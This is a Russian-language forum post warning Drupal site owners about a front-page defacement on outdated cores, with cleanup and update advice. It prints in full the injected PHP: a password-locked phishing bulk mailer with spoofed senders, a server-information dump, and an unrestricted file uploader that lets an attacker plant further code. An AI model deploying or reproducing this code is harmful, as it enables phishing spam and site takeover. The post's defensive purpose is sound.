6 мая 2016 в 23:05
На каком либо старом ядре drupal хакер может сделать себя администратором и добавить содержимое с кодом в новость на главной странице.
Код такой:
[user=session_start]session_start[/user]();
[user=set_time_limit]set_time_limit[/user](0);
if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){
die('');
}
$create_password = true;
$password = "oussama";
$pass=$_POST['pass'];
if($pass==$password){
$_SESSION['nst']="$pass";
}
if($create_password==true){
if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
die("
<noembed><xmp><body></xmp></noembed><noembed><xmp></body></html></xmp></noembed><title>Locked By Xsam_XAdoo </title><center><body background=white<table width=1 bgcolor=white><tr><td><font size=1 face=verdana><center><b></font></a><br></b></center><form method=post><font size=1 face=verdana color=808080><strong><center>LockeD By Sam!Adoo<br>pass pls:</center></strong><br><input type=password name=pass size=10></form>
</td></tr></table>
");}
}
$testa = $_POST['veio'];
if($testa != "") {
$message = $_POST['html'];
$subject = $_POST['assunto'];
$nome = $_POST['nome'];
$de = $_POST['de'];
$to = $_POST['emails'];
$email = explode("\n", $to);
$message = stripslashes($message);
$i = 0;
$count = 1;
while($email[$i]) {
$ok = "ok";
$headers = "MIME-Version: 1.0\n";
$headers .= "Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit
X-Mailer: EDMAIL R6.00.02
Content-Length: 41061\n";
$headers .= "From: ".$email[$i]."\r\n";
if(mail($email[$i], $subject, $message, $headers))
echo "<font color=gren>* Nъmero: $count <b>".$email[$i]."</b> <font color=gren>Sent....!</font><br><hr>";
else
echo "<font color=red>* Nъmero: $count <b>".$email[$i]."</b> <font color=red>Error in Sending ??</font><br><hr>";
$i++;
$count++;
}
$count--;
if($ok == "ok")
echo "";
}
?>
<html>
<head>
<title> XMG Priv8 Mailer</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>
body {
margin-left: 0;
margin-right: 0;
margin-top: 0;
background-color: #000000;
margin-bottom: 0;
}
.titulo {
font-family: Arial, Helvetica, sans-serif;
font-size: 70px;
color: #1BF51F;
font-weight: bold;
}
.normal {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #1BF51F;
}
.form {
font-family: Arial, Helvetica, sans-serif;
font-size: 10px;
color: #FFFFFF;
background-color: #000000;
border: 1px dashed #666666;
}
.texto {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
}
.alerta {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
color: #990000;
font-size: 10px;
}
</style>
</head>
<body>
<form action="" method="post" enctype="multipart/form-data" name="form1">
<input type="hidden" name="veio" value="sim">
<tr>
<table border="0" width="53%" bordercolorlight="#000000" bordercolordark="#000000" style="border: 1px ridge #1BF51F" bgcolor="black" >
<td width="462" height="25" align="center" bgcolor="#000000"><span class="titulo">Sam!Adoo</span></td>
<tr align="left">
<td colspan="2" ><font color="#1BF51F">
Server Name: <?php echo $UNAME = [user=php_uname]php_uname[/user](); ?><br>
System: <?php echo $OS = [user=PHP_OS]PHP_OS[/user]; ?><br>
Server IP: <?php echo $_SERVER['SERVER_ADDR']; ?><br>
Software : <?php echo $_SERVER['SERVER_SOFTWARE']; ?><br>
Admin Mail: <?php echo $_SERVER['SERVER_ADMIN']; ?> <br>
Safe Mode: <?php echo $safe_mode = [user=ini_get]ini_get[/user]('safe_mode'); ?>
</td>
</center>
</tr>
<tr>
<td height="194" valign="top" bgcolor="#000000">
<table width="100%" border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
<tr>
<td align="right" height="17"><span class="texto">Subject:</span></td>
<td height="17"><input name="assunto" type="text" value="Please Login To Read This Email "class="form" id="assunto" style="width:100%" ></td>
</tr>
<tr align="center" bgcolor="#99CCFF">
<td height="20" colspan="2" bgcolor="#000000"><span class="texto">Gatorsé Mailer</span></td>
</tr>
<tr align="right">
<td height="146" colspan="2" valign="top"><br>
<textarea name="html" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html">
</textarea>
<span class="alerta">*Reminder: Text HTML</span></td>
</tr>
<tr align="center" bgcolor="#000000">
<td height="10" colspan="2"><span class="texto">Mailing List</span>
</tr>
<tr align="right">
<td height="136" colspan="2" valign="top"><br>
<textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails">
</textarea>
<span class="alerta">* Mail List</span> </td>
</tr>
<tr>
<td height="26" align="right" valign="top" colspan="2"><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="15" align="center" bgcolor="#000000"> </td>
</tr>
</table>
</form>
</body>
<?php
echo '<center><font color="Red" size="4">';
/// Script Upload By Thex@b1 \\\
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$mode = '0644';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if(isset($_FILES['image']['name'])) {
$qx = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $qx);
[user=chmod]chmod[/user] ($qx, octdec($mode));
echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo '</center></font>';
?>
Результат: блокирование главной страницы.
Решение: зайти на сайт не через главную страницу, например: (http://www.site.ru/user), залогиниться, удалить новость и главная страница заработает, после этого обновить ядро drupal, чтобы подобное не повторилось.
И поудалять левых админов из Пользователей.
| Вложение | Размер |
|---|---|
 sayt_.jpg | 37.07 КБ |
Комментарии
Очень ценная информация.